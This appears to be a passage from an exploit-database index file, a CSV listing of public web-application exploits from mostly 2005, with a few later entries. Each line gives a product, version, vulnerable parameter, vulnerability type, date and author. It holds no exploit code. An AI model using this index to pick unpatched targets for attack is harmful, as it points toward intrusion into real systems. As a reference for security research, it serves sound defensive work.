+25532,exploits/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Remote File Inclusion",2005-04-24,"James Bercegay",webapps,php, +25533,exploits/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Cross-Site Scripting",2005-04-24,"James Bercegay",webapps,php, +25534,exploits/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,webapps,php, +25535,exploits/php/webapps/25535.txt,"Invision Power Board 2.0.1 - 'QPid' SQL Injection",2005-04-26,SVT,webapps,php, +25536,exploits/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - 'IntProdID' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25537,exploits/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - 'StrCatalog_NAME' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25538,exploits/php/webapps/25538.txt,"GrayCMS 1.1 - 'error.php' Remote File Inclusion",2005-04-26,Kold,webapps,php, +25539,exploits/asp/webapps/25539.txt,"MetaCart2 - 'IntCatalogID' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25540,exploits/asp/webapps/25540.txt,"MetaCart2 - 'StrSubCatalogID' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25541,exploits/asp/webapps/25541.txt,"MetaCart2 - 'CurCatalogID' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25542,exploits/asp/webapps/25542.txt,"MetaCart2 - 'strSubCatalog_NAME' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25543,exploits/asp/webapps/25543.txt,"MetaCart2 - 'SearchAction.asp' Multiple SQL Injections",2005-04-26,Dcrab,webapps,asp, +25544,exploits/asp/webapps/25544.txt,"MetaBid Auctions - 'intAuctionID' SQL Injection",2005-04-26,Dcrab,webapps,asp, +25545,exploits/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' SQL Injection",2004-04-26,jericho+bblog@attrition.org,webapps,php, +25548,exploits/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,webapps,php, +25549,exploits/php/webapps/25549.txt,"Claroline 1.5/1.6 - 'toolaccess_details.php?tool' Cross-Site Scripting",2005-04-27,"Sieg Fried",webapps,php, +25550,exploits/php/webapps/25550.txt,"Claroline 1.5/1.6 - 'user_access_details.php?data' Cross-Site Scripting",2005-04-27,"Sieg Fried",webapps,php, +25551,exploits/php/webapps/25551.txt,"Claroline 1.5/1.6 - 'myagenda.php?coursePath' Cross-Site Scripting",2005-04-27,"Sieg Fried",webapps,php, +25552,exploits/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections",2005-04-27,"Sieg Fried",webapps,php, +25553,exploits/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection",2005-04-27,"Sieg Fried",webapps,php, +25555,exploits/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?P' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",webapps,php, +25556,exploits/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?Q' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",webapps,php, +25558,exploits/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",webapps,php, +25560,exploits/php/webapps/25560.txt,"Just William's Amazon Webstore - 'Closeup.php?Image' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php, +25564,exploits/php/webapps/25564.txt,"Just William's Amazon Webstore - 'CurrentIsExpanded' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php, +25565,exploits/php/webapps/25565.txt,"Just William's Amazon Webstore - 'searchFor' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php, +25566,exploits/php/webapps/25566.txt,"Just William's Amazon Webstore - 'CurrentNumber' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php, +25567,exploits/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,webapps,php, +25568,exploits/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php?PHPcoinsessid' SQL Injection",2005-04-28,Dcrab,webapps,php, +25569,exploits/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple SQL Injections",2005-04-28,Dcrab,webapps,php, +25570,exploits/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' SQL Injection",2005-04-30,admin@batznet.com,webapps,php, +25575,exploits/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,webapps,php, +25576,exploits/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php?page' Cross-Site Scripting",2005-05-02,Lostmon,webapps,php, +25577,exploits/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'reviews.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,webapps,php, +25578,exploits/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'product_details.php?category_id' Cross-Site Scripting",2005-05-02,Lostmon,webapps,php, +25579,exploits/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'products.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,webapps,php, +25580,exploits/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'news_view.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,webapps,php, +25720,exploits/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",webapps,php, +25585,exploits/asp/webapps/25585.txt,"Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp, +25586,exploits/asp/webapps/25586.txt,"Maxwebportal 1.3 - 'links_popular.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp, +25587,exploits/asp/webapps/25587.txt,"Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp, +25588,exploits/asp/webapps/25588.txt,"Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp, +25589,exploits/asp/webapps/25589.txt,"Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections",2005-05-02,s-dalili,webapps,asp, +25590,exploits/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",webapps,php, +25591,exploits/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",webapps,php, +25592,exploits/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,webapps,cgi, +25593,exploits/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting",2005-05-03,"arron ward",webapps,php, +25594,exploits/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting",2005-05-04,"Nathan House",webapps,cgi, +25595,exploits/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Defer.asp' SQL Injection",2005-05-04,Zinho,webapps,asp, +25596,exploits/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Details.asp' SQL Injection",2005-05-04,Zinho,webapps,asp, +25599,exploits/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,webapps,php, +25601,exploits/php/webapps/25601.txt,"FishCart 3.1 - 'display.php?nlst' Cross-Site Scripting",2005-05-04,Dcrab,webapps,php, +25602,exploits/php/webapps/25602.txt,"FishCart 3.1 - 'upstracking.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-04,Dcrab,webapps,php, +25603,exploits/php/webapps/25603.txt,"FishCart 3.1 - 'display.php?psku' SQL Injection",2005-05-04,Dcrab,webapps,php, +25604,exploits/php/webapps/25604.txt,"FishCart 3.1 - 'upstnt.php?cartid' SQL Injection",2005-05-04,Dcrab,webapps,php, +25605,exploits/php/webapps/25605.txt,"WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",webapps,php, +25606,exploits/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,webapps,php, +30092,exploits/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Multiple Remote File Inclusions",2007-05-28,"Hasadya Raed",webapps,php, +25821,exploits/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 - 'index.php' Cross-Site Scripting",2005-06-14,An0nym0uS,webapps,php, +25823,exploits/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,webapps,php, +25824,exploits/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",webapps,php, +25825,exploits/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",webapps,php, +25612,exploits/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' Cross-Site Scripting",2005-05-05,"Alberto Trivero",webapps,php, +25614,exploits/php/webapps/25614.txt,"MidiCart PHP - 'Search_List.php?SearchString' SQL Injection",2005-05-05,Exoduks,webapps,php, +25615,exploits/php/webapps/25615.txt,"MidiCart PHP - 'Item_List.php?MainGroup' SQL Injection",2005-05-05,Exoduks,webapps,php, +25616,exploits/php/webapps/25616.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' SQL Injection",2005-05-05,Exoduks,webapps,php, +25617,exploits/php/webapps/25617.txt,"MidiCart PHP - 'Item_Show.php?Code_No' SQL Injection",2005-05-05,Exoduks,webapps,php, +25618,exploits/php/webapps/25618.txt,"MidiCart PHP - 'Search_List.php?SearchString' Cross-Site Scripting",2005-05-05,Exoduks,webapps,php, +25619,exploits/php/webapps/25619.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' Cross-Site Scripting",2005-05-05,Exoduks,webapps,php, +25620,exploits/php/webapps/25620.txt,"MidiCart PHP - 'Item_List.php?MainGroup' Cross-Site Scripting",2005-05-05,Exoduks,webapps,php, +25622,exploits/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - 'Admin.cgi?EntryID' Cross-Site Scripting",2005-05-05,"Spy Hat",webapps,cgi, +25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,webapps,php, +25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp, +25630,exploits/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php?Entry' SQL Injection",2005-05-09,"Spy Hat",webapps,php, +25632,exploits/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",webapps,cgi, +25634,exploits/cgi/webapps/25634.txt,"Easy Message Board - Remote Command Execution",2005-05-09,"SoulBlack Group",webapps,cgi, +25635,exploits/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation",2005-05-09,fistfuxxer@gmx.de,webapps,php, +25637,exploits/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' Cross-Site Scripting",2005-05-09,Lostmon,webapps,php, +25638,exploits/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' SQL Injection",2005-05-09,Lostmon,webapps,php, +25639,exploits/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",webapps,php, +25640,exploits/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - 'Profil.php' SQL Injection",2005-05-09,"SecuBox fRoGGz",webapps,php, +25641,exploits/php/webapps/25641.txt,"WowBB 1.6 - 'View_User.php' SQL Injection",2005-05-10,Megasky,webapps,php, +25642,exploits/php/webapps/25642.txt,"NukeET 3.0/3.1 - Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko & Lostmon",webapps,php, +25644,exploits/php/webapps/25644.txt,"e107 Website System 0.617 - 'Request.php' Directory Traversal",2005-05-10,Heintz,webapps,php, +25645,exploits/php/webapps/25645.txt,"e107 Website System 0.617 - 'Forum_viewforum.php' SQL Injection",2005-05-10,Heintz,webapps,php, +25649,exploits/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,webapps,cgi, +25650,exploits/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,webapps,php, +25651,exploits/asp/webapps/25651.txt,"Maxwebportal 1.3x - 'post.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-05-11,Zinho,webapps,asp, +25653,exploits/php/webapps/25653.txt,"DirectTopics 2 - 'topic.php' SQL Injection",2005-05-12,"Morinex Eneco",webapps,php, +25654,exploits/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' Cross-Site Scripting",2005-05-13,"Morinex Eneco",webapps,php, +25655,exploits/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' SQL Injection",2005-05-13,"Morinex Eneco",webapps,php, +25656,exploits/php/webapps/25656.txt,"OpenBB 1.0.8 - 'Read.php' SQL Injection",2005-05-13,Megasky,webapps,php, +25657,exploits/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,webapps,php, +25659,exploits/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,webapps,php, +25660,exploits/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,webapps,php, +25661,exploits/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Disclosure",2005-05-01,"g0rellazz G0r",webapps,asp, +25662,exploits/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",webapps,php, +25663,exploits/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",webapps,php, +25664,exploits/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",webapps,php, +25665,exploits/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,webapps,php, +25666,exploits/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",webapps,cgi, +25667,exploits/asp/webapps/25667.txt,"MetaCart E-Shop - 'ProductsByCategory.asp' Cross-Site Scripting",2005-05-16,"Dedi Dwianto",webapps,asp, +25668,exploits/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - 'Sigmaweb.dll' SQL Injection",2005-05-16,"mehran gashtasebi",webapps,cgi, +25671,exploits/php/webapps/25671.txt,"NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection",2005-05-16,NoSP,webapps,php, +25672,exploits/php/webapps/25672.txt,"NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection",2005-05-16,NoSP,webapps,php, +25673,exploits/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_statistik.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25674,exploits/php/webapps/25674.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal.php?anzahl_beitraege' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25675,exploits/php/webapps/25675.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_beitraggraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25676,exploits/php/webapps/25676.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_viewsgraf.php?tag' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25677,exploits/php/webapps/25677.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_themengraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25678,exploits/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_mitgraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25679,exploits/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_sponsor.php?id' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php, +25681,exploits/php/webapps/25681.php,"Fusionphp Fusion News 3.3/3.6 - X-Forworded-For PHP Script Code Injection",2005-05-24,"Network security team",webapps,php, +25682,exploits/php/webapps/25682.txt,"WordPress 1.5 - 'post.php' Cross-Site Scripting",2005-05-17,"Thomas Waldegger",webapps,php, +25683,exploits/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",webapps,php, +25685,exploits/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",webapps,jsp, +25686,exploits/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Inclusion",2005-05-19,"Ingvar Gilbert",webapps,php, +25689,exploits/php/webapps/25689.txt,"EJ3 TOPo 2.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,webapps,php, +25690,exploits/php/webapps/25690.pl,"PortailPHP 1.3 - 'ID' SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",webapps,php, +25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php, +25766,exploits/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25700,exploits/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,webapps,asp, +25701,exploits/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,webapps,asp, +25702,exploits/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",webapps,java, +25704,exploits/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",webapps,php, +25705,exploits/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,webapps,asp, +25715,exploits/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,webapps,hardware, +25716,exploits/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php?module' Blind SQL Injection",2013-05-26,mr.pr0n,webapps,php, +25721,exploits/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",webapps,php, +25723,exploits/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,webapps,php, +25724,exploits/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,webapps,php, +25726,exploits/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection",2013-05-26,Rooster(XEKA),webapps,php, +25727,exploits/php/webapps/25727.txt,"BookReview 1.0 - 'add_review.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,webapps,php, +25728,exploits/php/webapps/25728.txt,"BookReview 1.0 - 'add_contents.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,webapps,php, +25729,exploits/php/webapps/25729.txt,"BookReview 1.0 - 'suggest_category.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25730,exploits/php/webapps/25730.txt,"BookReview 1.0 - 'contact.htm?user' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25731,exploits/php/webapps/25731.txt,"BookReview 1.0 - 'add_booklist.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25732,exploits/php/webapps/25732.txt,"BookReview 1.0 - 'add_url.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25733,exploits/php/webapps/25733.txt,"BookReview 1.0 - 'search.htm?submit string' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25734,exploits/php/webapps/25734.txt,"BookReview 1.0 - 'add_classification.htm?isbn' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25735,exploits/php/webapps/25735.txt,"BookReview 1.0 - 'suggest_review.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php, +25738,exploits/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp, +25739,exploits/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp, +25740,exploits/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,webapps,php, +25741,exploits/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,webapps,php, +25742,exploits/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - 'admin.php?language' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25743,exploits/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - 'powerpack_f.php?language' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25744,exploits/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - 'sdv_infos.php?sitename' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25745,exploits/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php?Lettre' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25746,exploits/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - 'reviews.php?title' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25747,exploits/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - 'reply.php?image_subject' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25748,exploits/php/webapps/25748.txt,"NPDS 4.8 < 5.0 Glossaire Module - 'terme' SQL Injection",2005-05-28,NoSP,webapps,php, +25749,exploits/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - 'links.php?Query' SQL Injection",2005-05-28,NoSP,webapps,php, +25750,exploits/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - 'faq.php?categories' Cross-Site Scripting",2005-05-28,NoSP,webapps,php, +25751,exploits/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",webapps,asp, +25753,exploits/asp/webapps/25753.txt,"Hosting Controller 6.1 - 'resellerresources.asp?jresourceid' SQL Injection",2005-05-28,"GrayHatz Security Group",webapps,asp, +25754,exploits/asp/webapps/25754.txt,"Hosting Controller 6.1 - 'plandetails.asp' Information Disclosure",2005-05-28,"GrayHatz Security Group",webapps,asp, +25756,exploits/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,webapps,php, +25758,exploits/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",webapps,asp, +40391,exploits/php/webapps/40391.txt,"WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure",2016-09-19,david-peltier,webapps,php,80 +25759,exploits/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25760,exploits/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25761,exploits/php/webapps/25761.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25762,exploits/php/webapps/25762.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25763,exploits/php/webapps/25763.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25764,exploits/php/webapps/25764.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25765,exploits/php/webapps/25765.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25767,exploits/php/webapps/25767.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25768,exploits/php/webapps/25768.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25769,exploits/php/webapps/25769.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25770,exploits/php/webapps/25770.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25771,exploits/php/webapps/25771.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25772,exploits/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25773,exploits/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25774,exploits/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php, +25819,exploits/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",webapps,php, +33411,exploits/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink & Essandre",webapps,php, +33412,exploits/php/webapps/33412.txt,"iSupport 1.8 - 'index.php?which' Cross-Site Scripting",2009-12-16,"Stink & Essandre",webapps,php, +33413,exploits/php/webapps/33413.txt,"Pluxml-Blog 4.2 - '/core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,webapps,php, +33416,exploits/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Local File Inclusion",2009-12-17,"Juan Galiana Lara",webapps,php, +33417,exploits/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,webapps,php, +33418,exploits/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' SQL Injection",2009-12-17,"Fl0riX & Snakespc",webapps,php, +33419,exploits/php/webapps/33419.txt,"F3Site 2009 - '/mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,webapps,php, +33420,exploits/php/webapps/33420.txt,"F3Site 2009 - '/mod/new.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,webapps,php, +40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,webapps,php,80 +33421,exploits/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,webapps,php, +33422,exploits/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,webapps,php, +33424,exploits/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,webapps,php, +33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80 +25777,exploits/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",webapps,php, +25778,exploits/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,webapps,php, +25779,exploits/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injections",2005-05-31,"Alberto Trivero",webapps,php, +25780,exploits/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,webapps,asp, +25781,exploits/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",webapps,asp, 